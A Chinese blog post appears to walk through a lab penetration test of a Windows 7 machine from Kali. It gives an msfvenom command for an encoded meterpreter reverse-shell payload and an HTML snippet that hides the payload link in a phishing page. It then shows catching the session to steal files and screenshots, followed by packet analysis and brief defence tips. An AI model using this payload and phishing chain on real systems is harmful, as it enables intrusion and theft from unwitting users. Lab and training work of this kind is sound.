安全渗透测试-win7

已于 2022-06-24 16:16:44 修改
阅读量2.5k 收藏 33
点赞数 5
文章标签: 安全 网络 运维
于 2022-06-24 16:15:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuguangshibei/article/details/125439156
版权

安全渗透测试-win7-后门利用

环境说明:

攻击机:kali

靶机:windows7x64

靶机开放服务:Apache2.4.39、MySQL5.7.26

信息收集

采用工具:nmap、nessus

(1)执行ifconfig命令,查看本机IP地址为:192.168.2.65。采用nmap的ping扫描,扫描当前网络C段,查看存活的主机。
在这里插入图片描述
(2)使用nmap的SYN扫描,查询C段地址30-70的主机,找到开放80端口的windows主机,即为目标主机IP:192.168.2.60。
在这里插入图片描述
(3)查询目标主机的操作系统为Windows 7|2008|8.1
在这里插入图片描述
(4)用nessus查询目标主机的漏洞,如图所示:
在这里插入图片描述

渗透测试:

通过nessus找到目标系统的80端口开放并存在漏洞,准备利用该漏洞进行攻击。
(1)通过msfvenom生成后门木马并指定木马回弹的ip地址为kali攻击机,端口指定为4567端口:如图中shell.exe
终端输入:
: msfvenom -p windows/meterpreter_reverse_tcp LHOST={xxx.xxx.xxx.xxx} LPORT={xxxx} -e x86/shikata_ga_nai -f exe -o new.exe -i 5

在这里插入图片描述
(2)制作一个简单的静态钓鱼网站,并在网站中隐藏植入刚刚生成的shell文件。ps:不会写前端的宝贝也无所谓,网上随便找
一个html的静态页面代码就可以,然后在代码中插入:

    <li class="nav-item">
	<a class="nav-link" href="./shell.exe">标题任取</a>
	</li>

在这里插入图片描述
在kali中通过python开启简单web服务。PS:端口被占用开启失败的可以换一个端口
在这里插入图片描述
(3)在靶机中访问目标网站,并点击链接。
在这里插入图片描述
在靶机中下载shell文件:PS:靶机中防火墙等可能会自动清除,注意分辨
在这里插入图片描述
(4)在kali攻击机中开启msf,并使用handler监听模式:
在这里插入图片描述
设置lhost与lport与shell中设置的一样:
输入run命令,开始执行,并等待靶机上线:
在这里插入图片描述
(5) 在靶机中点击shell文件,回弹到kali,成功建立会话 ,在kali中使用dir、cat等命令成功获取指定文件:
在这里插入图片描述
在kali中截取靶机屏幕截图:
在这里插入图片描述

过程分析:

如图所示:在建立靶机执行shell文件时,建立TCP会话,回传ACK帧,通过三次握手,建立TCP链接:
在这里插入图片描述
在kali中输入dir命令,可以看到有TCP协议抓包,回传PSH帧,表明双方有数据传输:
在这里插入图片描述
在这里插入图片描述
在kali中执行quit命令,退出监听,可见回传FIN帧,表示链接关闭,回传RST帧,表示链接重置:
在这里插入图片描述

靶机防御:

(1)在靶机中找到后台运行的shell.exe结束进程,则攻击机中会话将被关闭:
在这里插入图片描述
在这里插入图片描述
(2)打开防火墙后,在点击钓下载链接时,防火墙会自动处理下载的后门病毒,则不会给攻击者可乘之机,所以作为靶机用户还是要提高警惕心理,不要随便点击下载链接,有可疑文件一定要合理辨别。

流光拾贝
关注
  • 5
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
10.100个渗透测试实战#10(DC-5)
qwsn
03-30 2692
世间一切即可努力 ...
网络安全80端口—-PHP CGI参数注入执行漏洞
旺仔Sec&blog
07-24 1329
80——-PHP CGI参数注入执行漏洞
常见端口对应服务及入侵方式
爱是与世界平行
03-13 3062
常见端口对应服务及入侵方式一、端口服务及利用简析1.1 文件共享服务端口1.2 远程连接服务端口1.3 Web应用服务端口1.4 数据库端口服务1.5 邮件服务端口1.6 网络常见协议端口1.7 特殊服务端口二、端口入侵详情2.1 21端口入侵2.2 23端口入侵2.3 53端口入侵2.4 80端口入侵2.5 135端口入侵2.6 139/445端口入侵2.7 1433端口入侵2.8 1521端口...
(CVE-2012-1823)PHP-CGI远程代码执行漏洞80端口
最新发布
m0_62670778的博客
05-12 644
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi。
kali渗透80端口的php,kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描...
weixin_28790465的博客
04-02 4691
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示: 因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。而且此网站并没有其他端口的开放,说明安全性还是很好的...
TryHackMe学习笔记-The Cod Caper
网安星空
12-17 1384
TryHackMe靶场,联系SQL注入、命令执行等常见漏洞和基本的缓冲区溢出提权
kali linux 中间人攻击
cg_sss的博客
05-21 1301
中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。
30 天渗透测试练习1.pdf
10-06
网络安全渗透测试是评估网络防御能力的一种方法,模拟黑客攻击行为以发现潜在漏洞。"30天渗透测试练习1.pdf" 提供了一个自我学习和实践的计划,旨在通过一系列的在线平台和虚拟环境来提升安全技能。这个计划没有特定...
Nessus-8.12.1-Win32.msi
11-03
Nessus8.12.1,x86版本,发布时间:Oct 29, 2020,适用系统:Windows 7, 8, 10 (32-bit),
基于metasploit框架的渗透测试方法研究
12-15
渗透测试概述】 ...通过对win7和win10操作系统的渗透测试,我们可以深入理解系统安全状况,及时发现并修复漏洞,降低安全风险。因此,熟练掌握Metasploit框架的应用,对于保障网络安全具有重要意义。
mimikatz_trunk-win7密码
02-26
它通过读取操作系统内存中的数据来实现这一目标,这使得它在渗透测试安全审计中极为有用。"trunk"通常指的是开发版本或未发布的更新,暗示这里可能包含Mimikatz的最新功能或改进。 在描述中提到的"Mimikatz_trunk...
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
中国蚁剑,AntSword-Loader-v4.0.3-win32-x64和antSword-master
09-07
中国蚁剑,全称为AntSword,是一款开源的Web管理工具,主要用于网站的安全检测、渗透测试以及Webshell管理。这款工具因其高效、易用的特点,在网络安全领域内广受关注。本文将围绕AntSword-Loader-v4.0.3-win32-x64...
metasploitframework-win-x64
10-05
使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数...
渗透基础笔记+作业(永恒之蓝复现)
09-08
渗透测试是一种重要的网络安全评估方法,旨在模拟黑客攻击行为,揭示潜在的安全漏洞,以增强系统防护能力。这个过程涉及多个步骤,从前期交互开始,到后期的渗透攻击和报告撰写。 前期交互是渗透测试的起点,测试...
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
【工控安全职业证书技能实践:内网横向渗透测试与实战】 工控安全涉及的是工业控制系统中的网络安全,它要求专业人士具备识别、防范和应对安全威胁的能力。本实践课程旨在教授学员如何进行内网横向渗透测试,模拟...
kali渗透80端口的php,一次对内网服务器的KALI渗透测试
weixin_36059283的博客
04-02 2072
近年来实战较少,基本研究渗透测试技术和常见问题的解决。这次应贝塔安全队成员@蜗牛哥哥的邀请和队成员一起参加了这次的某所大学渗透测试的实战目标场,正好最近也没事就带来了练习者。首先,我们根据攻击a组发送的两份文件,简单地制作图纸,在渗透测试过程中非常容易见到,根据Zeportier客户端加入目标场内部网络,成功地连接到Kali攻击机。(1)根据攻击说明中的提示,可以根据网络攻击和系统脆弱性获得该机械...
安全检测80端口Web服务攻击痕迹(上)
萧逸闲侃
02-28 1341
web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomorph对一些80端口攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题。   [详细描述]   下面部分通过一些列子,展示对web服务器和其上的应用程序普遍的攻击,和其留下的痕迹,这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻击形式,这部
80端口攻击_「网络安全」常见攻击篇(6)——木马攻击
weixin_39846612的博客
11-08 2655
什么是木马攻击?木马指的是隐藏在正常程序中的一段具有特殊功能的代码,实质上是一种远程控制软件,是一种未经授权,利用网络欺骗或者攻击的手段装入目标计算机中。木马用表面的有趣的、有用的功能来吸引人,但实际上暗含一些不为人知的功能,如复制文件、删除文件、修改计算机配置、浏览文件等。木马通常有两个可执行的程序:一个是客户端,一个是服务端。黑客电脑上安装客户端,目标对象电脑上安装服务端,黑客在远端操作目标对...
渗透系统虚拟机----win7
08-25
对于渗透测试,使用虚拟机是一个常见的做法,因为它提供了一个隔离的环境,可以安全地进行各种测试。如果你想在虚拟机中运行Windows 7,你可以按照以下步骤进行操作: 1. 虚拟化软件:首先,你需要选择一个虚拟化软件,比如VirtualBox、VMware Workstation或者VMware Player。这些软件都支持在它们的虚拟机中运行Windows 7。 2. 下载Windows 7 ISO文件:在安装Windows 7之前,你需要下载Windows 7的ISO镜像文件。这个文件包含了安装Windows 7所需的所有文件。 3. 创建新的虚拟机:打开虚拟化软件,创建一个新的虚拟机。在创建过程中,选择Windows 7作为操作系统,并指定从步骤2中下载的ISO文件作为安装媒介。 4. 安装Windows 7:启动虚拟机,并按照屏幕上的指示安装Windows 7。这个过程与在实际硬件上安装Windows 7类似。 5. 配置网络:一旦安装完成,配置虚拟机的网络设置,以便它可以与其他设备通信。你可以选择桥接模式、NAT模式或者仅主机模式,具体取决于你的需求。 6. 更新和配置:安装完Windows 7后,记得更新操作系统并配置它以满足你的需求。你可能需要安装防火墙、杀毒软件等工具来提高安全性。 完成上述步骤后,你就可以在Windows 7虚拟机中进行渗透测试了。请注意,在进行任何渗透测试之前,确保你已经获得了合法授权,并且只在授权范围内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值